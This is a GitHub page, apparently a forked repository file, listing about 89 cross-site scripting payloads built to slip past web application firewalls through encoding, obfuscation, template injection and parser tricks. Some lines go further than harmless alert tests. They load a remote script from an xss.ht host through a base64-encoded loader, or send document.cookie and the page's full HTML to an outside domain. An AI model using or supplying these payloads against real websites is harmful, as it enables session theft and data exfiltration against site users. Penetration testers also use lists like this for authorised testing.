forked from soufianetahiri/randomLists
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathXSS_payloads_WAFBypass
89 lines (89 loc) · 5.44 KB
/
XSS_payloads_WAFBypass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
<svg onload=prompt%26%23x000000028;document.domain)>
<svg onload=prompt%26%230000000040document.domain)>
{{[]."-alert`1`-"}}
JavaScript://%250Dtop.confirm(1)//?1
test ‘-Function`self[‘a’\x2b’l’\x2b’e’\x2b’r’\x2b’t’]\x281\x29```-’
test ‘-Function`self[‘a’+’l’+’e’+’r’+’t’](1)```-’
test ‘-Function`self[‘a’\x2b’l’\x2b’e’\x2b’r’\x2b’t’]\x281\x29```-’
{{$on.constructor{'\\u\u007b61}lert`1`')()}}
<svg onload=alert%26%230000000040"1")>
'alert(1)'.match({__proto__:RegExp.prototype,global:1,unicode:1,exec:eval})
<math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><style><a title="</style><img src onerror='alert(1)'>"></style></h1>
window&&=(window&&=opener||=alert)?.(1??0,)
<x/ onpointerRawupdatE=+\u0061\u006cert`1`>
<svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'>
eval('\\'+'\u'+'0061lert("Safari")')
<x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337`
<object/data=javascript:alert()>
<a/href="javascript%0A%0D:alert()">
{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'
<script>onload=setTimeoutEvent.prototype.toString=_=>"alert\501\51"</script>
<svg/onload=throw/**/Uncaught=window.onerror=eval,";alert\501\51">
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<script/%00%00v%00%00>document.location.href=location.hash.slice(1)</script>#javascript:alert(document.cookie)
<svg><animatetransform onbegin=alert(1) attributeName=transform>
<svg/onload=throw/**/onerror=alert,1>
"><video><source onerror=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
<A%09onmOuSeoVER%0a=%0aa=alert,a(document.domain)>xss
<x v-html=_c.constructor('alert(1)')()>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<xss onafterscriptexecute=alert(1)><script>1</script>
<Brute Data-Spy=scroll Data-Target='<Svg OnLoad=(confirm)(1)>'>
Javascript://%E2%80%A9alert(1)
<brute contenteditable autofocus onfocus=alert(1)>
<style/><img src="z'z</style><script/z>alert(1)</script>">
<svg onload="alert(1)" <="" svg=""
<a autofocus onfocus=alert(23) href=#>x</a>
<svg/OnLoad="`${prompt``}`">
<script/src="'-alert(document.domain)-'"></script>
%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
soufiane"><x/onafterscriptexecute=confirm%26lpar;)//
{{constructor.constructor('eval(atob(\'amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5jb29raWUp\'))')()}}
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
<math><x xlink:href=javascript:confirm`1`>click
<iframe srcdoc=<svg/onload=alert(1)>>
<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>
<svg<0x0c>onload=alert(1)><svg>
'><details/open/ontoggle=confirm(document.location)>
%0aalert(/1337/)//
';a=alert;a(1);//
<script%0a>
<div onpointerrawupdate=alert(1) style=width:100%;height:100%;position:absolute;background-color:red>test
<</p>iframe src=javascript:alert()//
<script>x = '<!--<script>'/*</script>-->*/;alert(1)</script
<svg onload="import('data:text/javascript,al'+''+'ert(0)')">
<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` {}'>
<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "https://soufiane.website"; </script>
<a href=javascript:alert(1)>
<a href=javascript:confirm(1)>
<a href="jav%0Dascript:alert(1)">
window[document.body.innerText.charAt(document.body.innerText.indexOf('a'))+'lert'](1)
<img src=something onauxclick="new Function `al\ert\`xss\``">
<svg id=javascript:alert(10) onload=location=id>
<svg/onload=%26nbsp;alert`soufiane`+1'"><img/src/onerror=.1|alert``>
<img src onerror=%26emsp;prompt`${document.domain}`>
<img src="img-src" onloadstart="alert(45)">
<img src="img-src" onloadend="alert(45)">
<details onauxclick=confirm`xss`></details>
<frameset onpageshow=alert(1)>
<svg onunload=http://window.open('javascript:alert(1)')>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<svg%0Aonauxclick=0;[1].some(confirm)//
<xss<script>>&28;prompt();&28;<</script>/xss>
<svg><b><style><img id="</style><img src=1 onerror=alert(1)>">
<</div>script</div>>alert()<</div>/script</div>>
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
<svg/onload="(new Image()).src='//soufiane.website/'%2Bdocument.documentElement.innerHTML">
">'><details/open/ontoggle=confirm('XSS')>
%ff%fe%3C%00s%00c%00r%00i%00p%00t%00/%00C%00r%00c%00=%00%22%00%22%00%2f%00s%00r%00c%00=%00?%00c%00a%00l%00l%00b%00a%00c%00k%00=%00a%00l%00e%00r%00t%00%3E%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E%00
<noembed><img src="</noembed><iframe onload=alert(1)>" /></noembed>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
javascript:"/*'/*`/*--><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript://comment%0a%0dalert(0);
%27<%2FscRipt><scRipt>alert%280%29<%2FscRipt>
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)>
<svg><script href=data:,alert(1) />
Javascript://%E2%80%A9alert(1)
<Svg%K9OnLoad=%7Krompt%6K1%6K>